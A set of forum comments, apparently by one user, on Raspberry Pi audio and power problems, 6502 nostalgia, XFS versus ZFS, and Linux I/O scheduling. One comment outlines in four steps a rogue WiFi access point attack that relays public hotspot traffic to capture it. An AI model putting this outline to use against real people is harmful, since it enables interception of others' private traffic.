Adding a couple of chips in order to make one of your platforms more software compatible to others reduces development costs. That doesn't make them bastards in any way.
Funny coincidence, four days ago I woke up in an ambulance (long boring story) and the number on the inside door was 6502. I smiled stupidly and said "Hah! 6502!" and looked at the two EMTs sitting next to me. They looked quizzically at me.
"Oh right, I'm old." I said.
Not "sound server" in the sense that you mean.
One of the boards is to be tasked with replacing an aging automatic player in a interactive information booth, the other would replace two loop players in localized FM broadcasts, for the visitors to a tourist centre.
They'd serve sound to the public, not to network clients. But that still makes them servers.
I bought two Raspberry Pi(es) to use as audio servers and have been disappointed by the sound quality. The on-board audio out's DSP has limited bandwidth so sound is down-sampled to 11 bits. Scratchy. It's not advertised so that was a let-down.
Using a USB AUDIO dongle is no-go either, because of the crappy USB drivers. Stutters non-stop. Here are oscilloscope grabs of two music samples and a 1Khz tone: http://imgur.com/a/rVR99 The flat parts shouldn't be there. The only way to get good sound now is to use rather expensive USB soundboards or the HDMI output, but extracting line-level audio signals from that isn't a simple or cheap proposition.
The power design should be re-thought. If you power your Pi with exactly 5 volts, the voltage drop in the polyfuses causes early failures if you connect peripherals that have medium current demands. If you're lucky your power adapter might supply a bit more than 5 volts (5.25 is nice) and you might not experience too many problems. Me, I've soldered supply wires to test points T1(vcc) and T2(gnd) and bypassed the fuses completely.
I hope they come up with another revision, add a Low-drop-out regulator (+$2) and figure out the USB naggies.
Until then, caveat emptor.
I saw it back in 1987 over Montreal. Not only was it really neat to see the shuttle "in person", it was magnificent to see a 747 flying so low over my town.
If you're there, don't miss it!
FTA: Fragmentation in comets is rarely observed, but can occur when they are closest to the sun and develop spectacular tales of gas, dust and ice particles. The tale originates from the icy core (or nucleus), so when it heats up, vapor from sublimating ices are outgassed into space, dislodging dust and other material.
Shouldn't that be "tails" and "tail", or some different definition of the word "tale" I wasn't previously aware of?
*yours. Glass houses and such.
You know, after working on my own long term project (25 years between updates), which Spacewar over-shadows by a factor of two, I've realized that code I write now, no matter how trivial, may be read back a long time afterward. And since I'm a very sloppy programmer, this is is embarrassing on a large scale.
Oh well. http://sites.google.com/site/dannychouinard/Home/rdos3-2-coco2-enhanced-dos if you're curious.
XFS is extremely prone to data corruption if the system goes down uncleanly for any reason. We may strive for nine nines, but stuff still happens. A power failure on a large XFS volume is almost guaranteed to lead to truncated files and general lost data. Not so on ZFS.
[Citation Needed] as wikipedia would say. XFS is no more prone to data corruption than any other journalled filesystem in the event of unexpected halts.
You should see the fireworks I got on Solaris 10 while I was running a script that did a bunch of zpool commands just as the power went out. Borked everything.
I love ZFS, but I'm not deluded into thinking it's magic.
The entertainment packages don't have to live on the other side of the firewall, and they're not necessary to the security of the passengers. The article refers to the automotive module which controls engine functions.
Very different things.
Luxury. We used to have to get out of the lake at six o'clock in the morning, clean the lake, eat a handful of gravel, work twenty hour day at mill for tuppence a month, come home, and Dad would thrash us to sleep with a broken bottle, if we were lucky!
Meanwhile I'm working on a micro-controller project that runs at 500Hz (not kilo, just hertz).
If you keep the code tight and hand-craft it, 128Mhz is blindingly fast.
Idiots like this give the IT security field a bad name as being made up of charlatans and snake-oil sales men.
Sadly, in my experience, it mostly is made up of charlatans, snake-oil salesmen and incompetents. Good security people are really rare.
1. Bring laptop with extra WiFi dongle into a public area.
2. Connect to Free WiFi spot using internal nic.
3. Act as an Access Point on second nic with a cooler sounding SSID.
4. NAT traffic to first WiFi net and grab everything of interest.
The problem is this: Let's say you do an action that reads 5 blocks on the disk. While the system is idle it has nothing else to do so your 5 blocks are read immediately, super fast.
While the system is doing some other I/O intensive job, it might be doing 500 block reads at the same time. Everything goes in the same queue, so your task is only %1 of the requests that have to be done in a set time. Result: Your task takes 100 times longer.
This is the problem that all the scheduler are trying to solve: trying to be fair so that every task gets a reasonable share of priority, while keeping performance at an optimum level.
For example, some O/S researchers have tried to implemented multiple-tiered system where every I/O is tagged with flags that indicate if the call came from an interactive user action, or was generated by non-interactive jobs (daemons, lower-level layers, etc...) and then give higher priority to the user requests. Two problems with that approach is it can be very hard to differentiate the two and that any heavy user task may prevent system tasks to work in a timely fashion and the user tasks may depend on the system tasks to complete their jobs in order to proceed; vicious circles and race conditions.
I'm glad I'm not trying to code a kernel scheduler, they're very hard problems and figuring one out that can be fair for all types of uses is nigh impossible.
The great thing about the open source O/Ss is that everything's done in the open, there's intense discussions going on about in the field, and there's multiple solutions being worked on and tested.
To me, Linux has always felt like it gave much higher priority to I/O than the "user experience". It's something I've come to expect. If I copy gigabytes from a disk set to another I gladly accept that my web browser's going to be sluggish for a time, all the while feeling content that at least it's going to be done so efficiently that it's going to last for the shortest amount of time possible.
Other O/Ss that I won't name may "feel" better, but have nowhere near the same I/O throughput that Linux has.